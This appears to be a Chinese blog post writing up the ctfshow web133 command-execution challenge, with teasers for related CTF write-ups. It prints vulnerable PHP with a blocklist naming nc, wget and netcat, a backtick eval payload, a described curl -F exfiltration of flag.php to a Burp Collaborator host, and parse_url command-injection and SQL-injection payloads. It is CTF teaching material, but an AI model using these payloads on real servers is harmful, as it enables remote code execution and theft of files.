ctfshow web133和其他命令执行的骚操作

最新推荐文章于 2024-07-25 17:09:47 发布
原创 最新推荐文章于 2024-07-25 17:09:47 发布 · 5.9k 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf命令执行

本文分享了解析命令执行题目的实战经验,涉及PHP代码中的变量覆盖、curl-F利用、Base64和Hex编码绕过、三角函数题的巧妙解法。通过实例演示如何利用curl、grep和编码技巧在限制条件下获取flag。

这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作

一. ctfshow web入门 133

1.正常解
<?php
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
   
   
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
   
   
        eval(substr($F,0,6));
    }else{
   
   
        die("6个字母都还不够呀?!");
    }
}

这个题是自己出的主要是考察,命令执行的骚操作和curl -F的使用
分析一下代码发现仿佛是只能读取前面6个字符去执行命令,禁止了命令执行的函数,并且没有写入权限。可能利用就比较可能
但是,如果我们传递的参数就是$F本身,会不会发生变量覆盖?
那我们来一个简单的测试,

我们传递?F=`$F`;+sleep 3好像网站确实sleep了一会说明的确执行了命令
**那为什么会这样?**
因为是我们传递的`$F`;+sleep 3。先进行substr()函数截断然后去执行eval()函数
这个函数的作用是执行php代码,``是shell_exec()函数的缩写,然后就去命令执行。
而$F就是我们输入的`$F`;+sleep 3 使用最后执行的代码应该是
``$F`;+sleep 3`,就执行成功
这里可能有点绕,慢慢理解

然后就是利用curl去带出flag.php
curl -F 将flag文件上传到Burp的 Collaborator Client ( Collaborator Client 类似DNSLOG,其功能要比DNSLOG强大,主要体现在可以查看 POST请求包以及打Cookies)

# payload 
#其中-F 为带文件的形式发送post请求
#xx是上传文件的name值,flag.php就是上传的文件 
?F=`$F`;+curl -X
最低0.47元/天 解锁文章
CTFshow php特性 web133
Kradress的博客
12-17 2442
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-13 16:43:44 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 2203
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow其他
qq_45655564的博客
08-31 679
396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } payload url=http://`tac fl*`/var/www/html/1.txt 397 error_r
ctfshow 其他
qq_45951598的博客
01-11 3484
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
CTFshow——其他
D.MIND 的博客
08-17 2260
396——parse_url() 需要加上绝对路径 /?url=http://ls;echo `ls`/var/www/html/2.txt /?url=http://ls;echo `cat f*`/var/www/html/3.txt 397——parse_url() 使用../迁移目录 /?url=http://;echo `cat f*`/../var/www/html/1.txt 398~401 通杀了… ?url=http://`cat f*`/../var/www/html/7.txt
ctfshow--web入门(web101--web115&web123&web125-web133
qing_chuan_的博客
06-08 1362
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
CTFSHOW WEB题目
qq_45655564的博客
08-09 3251
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
ctfshowweb篇-SQL注入 wp
孤桜懶契
08-21 4994
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
[CTFSHOW]命令执行55-74
Huamang的博客
03-05 1675
web 55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
CTFSHOW其他篇
羽的博客
02-05 3184
web396、397、398、399、400、401 url=http://1/1;echo `ls`>a.txt url=http://1/1;echo `cat fl0g.php`>a.txt web402 payload:url=file://1/1;echo `cat fl0g.php`>a.txt web403 url=http://127.0.0.1/1;echo `cat fl0g.php`>a.txt
ctfshow 其他(持续更新)
Lum1n0us's Blog
08-13 1724
文章目录web396web397-401web402web403web404web405 web396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 可以先在本地测试一下pars
[CTFSHOW]CTFSHOW-其他WP
Y4tacker的博客
02-10 3450
文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w
ctfshow web入门 其他 web396--web412
2301_81040377的博客
05-21 921
这里我们要调用cafe类里面的add方法,而检验完IP之后刚好会使用call_user_func进行函数的调用。这里的函数写的是将//ctfshow进行一个拼接,那我们就可以使用一个换行进行绕过。这里说明了host必须是正常域名,我们就不能写命令了,只能用;还可以弹回显,直接不就用哦本地了,但是没影响直接打。对host过滤了分号,没影响。里面讲了危险函数的绕过。把http改成1就行。
ctfshow-web入门-其他分类(部分wp)-396-403
yutianovo的博客
01-16 707
396 传入 ?url=s;cat ls -al > 1.txt 得到 flag 位置 total 24 drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 . drwxr-xr-x 1 root root 4096 Oct 31 2019 .. -rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt -rw-r--r-- 1 w
ctfshow web入门 php特性 web131-web135
m0_62207170的博客
10-05 867
ctfshow web入门 php特性 web131-web135
ctfshow-web入门-php特性(web132-web136)
最新发布
Welcome To Myon'Blog !
07-25 2362
mt_rand(1, 0x36D) 会生成一个 1 到 877(十六进制0x36D)的随机数,因此 $code === mt_rand(1,0x36D) 这个条件很难满足,因为每次都会生成一个新的随机数,$code 很难与这个随机数相等。tr -cd 'a-zA-Z0-9-' 这个命令会删除所有不是字母、数字、减号的内容,原本我想将大括号也保留,但是试了下不行。flag 分为了两段,flag1 flag2,拼接起来,字母都改成小写字母,添加上大括号即可。
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 2657
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
ctfshow web133
08-09
根据引用中的代码段,web133页面上的代码是这样的: ```php error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){ eval(substr($F,0,6)); }else{ die("6个字母都还不够呀?!"); } } ``` 这段代码中,如果通过GET请求传入参数`F`,则会对`F`进行判断执行。如果`F`中不包含`system`、`nc`、`wget`、`exec`、`passthru`、`netcat`这些字符串,那么会对`F`进行`eval`执行,否则会返回一个错误信息"6个字母都还不够呀?!"。 因此,可以通过GET请求传入适当的参数`F`来执行代码。请注意,为了安全起见,请不要执行可疑的代码。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值